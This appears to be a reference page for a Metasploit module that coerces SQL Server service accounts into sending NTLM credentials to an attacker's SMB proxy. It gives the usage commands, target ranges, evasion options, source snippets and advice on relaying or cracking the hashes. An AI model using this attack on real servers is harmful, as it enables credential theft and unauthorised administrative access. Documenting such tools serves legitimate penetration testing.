Microsoft SQL Server NTLM Stealer - Metasploit


This page contains detailed information about how to use the auxiliary/admin/mssql/mssql_ntlm_stealer metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Microsoft SQL Server NTLM Stealer
Module: auxiliary/admin/mssql/mssql_ntlm_stealer
Source code: modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb
Disclosure date: -
Last modification time: 2017-07-24 06:26:21 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: ms-sql2000, ms-sql-s, sybase
Target network port(s): 1433, 1434, 1435, 2533, 2638, 9152, 14330
List of CVEs: -

This module can be used to help capture or relay the LM/NTLM credentials of the account running the remote SQL Server service. The module will use the supplied credentials to connect to the target SQL Server instance and execute the native "xp_dirtree" or "xp_fileexist" stored procedure. The stored procedures will then force the service account to authenticate to the system defined in the SMBProxy option. In order for the attack to be successful, the SMB capture or relay module must be running on the system defined as the SMBProxy. The database account used to connect to the database should only require the "PUBLIC" role to execute. Successful execution of this attack usually results in local administrative access to the Windows system. Specifically, this works great for relaying credentials between two SQL Servers using a shared service account to get shells. However, if the relay fails, then the LM hash can be reversed using the Halflm rainbow tables and john the ripper. Thanks to "Sh2kerr" who wrote the ora_ntlm_stealer for the inspiration.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/admin/mssql/mssql_ntlm_stealer
msf auxiliary(mssql_ntlm_stealer) > show options
    ... show and set options ...
msf auxiliary(mssql_ntlm_stealer) > set RHOSTS ip-range
msf auxiliary(mssql_ntlm_stealer) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(mssql_ntlm_stealer) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(mssql_ntlm_stealer) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(mssql_ntlm_stealer) > set RHOSTS file:/tmp/ip_list.txt

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the admin/mssql/mssql_ntlm_stealer auxiliary module looks in the msfconsole:

msf6 > use auxiliary/admin/mssql/mssql_ntlm_stealer

msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > show info

       Name: Microsoft SQL Server NTLM Stealer
     Module: auxiliary/admin/mssql/mssql_ntlm_stealer
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  nullbind <[email protected]>

Check supported:
  No

Basic options:
  Name                 Current Setting  Required  Description
  ----                 ---------------  --------  -----------
  PASSWORD                              no        The password for the specified username
  RHOSTS                                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT                1433             yes       The target port (TCP)
  SMBPROXY             0.0.0.0          yes       IP of SMB proxy or sniffer.
  TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
  THREADS              1                yes       The number of concurrent threads (max one per host)
  USERNAME             sa               no        The username to authenticate as
  USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)

Description:
  This module can be used to help capture or relay the LM/NTLM 
  credentials of the account running the remote SQL Server service. 
  The module will use the supplied credentials to connect to the 
  target SQL Server instance and execute the native "xp_dirtree" or 
  "xp_fileexist" stored procedure. The stored procedures will then 
  force the service account to authenticate to the system defined in 
  the SMBProxy option. In order for the attack to be successful, the 
  SMB capture or relay module must be running on the system defined as 
  the SMBProxy. The database account used to connect to the database 
  should only require the "PUBLIC" role to execute. Successful 
  execution of this attack usually results in local administrative 
  access to the Windows system. Specifically, this works great for 
  relaying credentials between two SQL Servers using a shared service 
  account to get shells. However, if the relay fails, then the LM hash 
  can be reversed using the Halflm rainbow tables and john the ripper. 
  Thanks to "Sh2kerr" who wrote the ora_ntlm_stealer for the 
  inspiration.

References:
  http://en.wikipedia.org/wiki/SMBRelay

Module Options


This is a complete list of options available in the admin/mssql/mssql_ntlm_stealer auxiliary module:

msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > show options

Module options (auxiliary/admin/mssql/mssql_ntlm_stealer):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOSTS                                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                1433             yes       The target port (TCP)
   SMBPROXY             0.0.0.0          yes       IP of SMB proxy or sniffer.
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   THREADS              1                yes       The number of concurrent threads (max one per host)
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)

Advanced Options


Here is a complete list of advanced options supported by the admin/mssql/mssql_ntlm_stealer auxiliary module:

msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > show advanced

Module advanced options (auxiliary/admin/mssql/mssql_ntlm_stealer):

   Name                    Current Setting                                                       Required  Description
   ----                    ---------------                                                       --------  -----------
   CHOST                                                                                         no        The local client address
   CPORT                                                                                         no        The local client port
   ConnectTimeout          10                                                                    yes       Maximum number of seconds to establish a TCP connection
   DOMAIN                  WORKSTATION                                                           yes       The domain to use for windows authentication
   HEX2BINARY              /opt/metasploit-framework/embedded/framework/data/exploits/mssql/h2b  no        The path to the hex2binary script on the disk
   NTLM::SendLM            true                                                                  yes       Always send the LANMAN response (except when NTLMv2_session is specified)
   NTLM::SendNTLM          true                                                                  yes       Activate the 'Negotiate NTLM key' flag, indicating the use of NTLM responses
   NTLM::SendSPN           true                                                                  yes       Send an avp of type SPN in the ntlmv2 client blob, this allows authentication on Windows 7+/Server 2008 R2+ when SPN is required
   NTLM::UseLMKey          false                                                                 yes       Activate the 'Negotiate Lan Manager Key' flag, using the LM key when the LM response is sent
   NTLM::UseNTLM2_session  true                                                                  yes       Activate the 'Negotiate NTLM2 key' flag, forcing the use of a NTLMv2_session
   NTLM::UseNTLMv2         true                                                                  yes       Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key is true
   Proxies                                                                                       no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL                     false                                                                 no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                                                                     no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER                                                                  no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto                                                                  yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1
                                                                                                           .2)
   ShowProgress            true                                                                  yes       Display progress messages during a scan
   ShowProgressPercent     10                                                                    yes       The interval in percent that progress should be shown
   VERBOSE                 false                                                                 no        Enable detailed status messages
   WORKSPACE                                                                                     no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the admin/mssql/mssql_ntlm_stealer module can do:

msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the admin/mssql/mssql_ntlm_stealer auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

xp_dirtree failed to initiate authentication to smbproxy.


Here is a relevant code snippet related to the "xp_dirtree failed to initiate authentication to smbproxy." error message:

45:	    # Call auth_force method to execute "xp_dirtree"
46:	    begin
47:	      force_auth("xp_dirtree",datastore['SMBPROXY'])
48:	      return
49:	    rescue
50:	      print_error("xp_dirtree failed to initiate authentication to smbproxy.")
51:	    end
52:	
53:	    # Call auth_force method to execute "xp_fileexist" if "xp_dirtree" fails
54:	    begin
55:	      force_auth("xp_fileexist",datastore['SMBPROXY'])

xp_fileexist failed to initiate authentication to smbproxy.


Here is a relevant code snippet related to the "xp_fileexist failed to initiate authentication to smbproxy." error message:

53:	    # Call auth_force method to execute "xp_fileexist" if "xp_dirtree" fails
54:	    begin
55:	      force_auth("xp_fileexist",datastore['SMBPROXY'])
56:	      return
57:	    rescue
58:	      print_error("xp_fileexist failed to initiate authentication to smbproxy.")
59:	    end
60:	
61:	  end
62:	
63:	  # Method to force sql server to authenticate

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • nullbind <scott.sutherland[at]netspi.com>

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.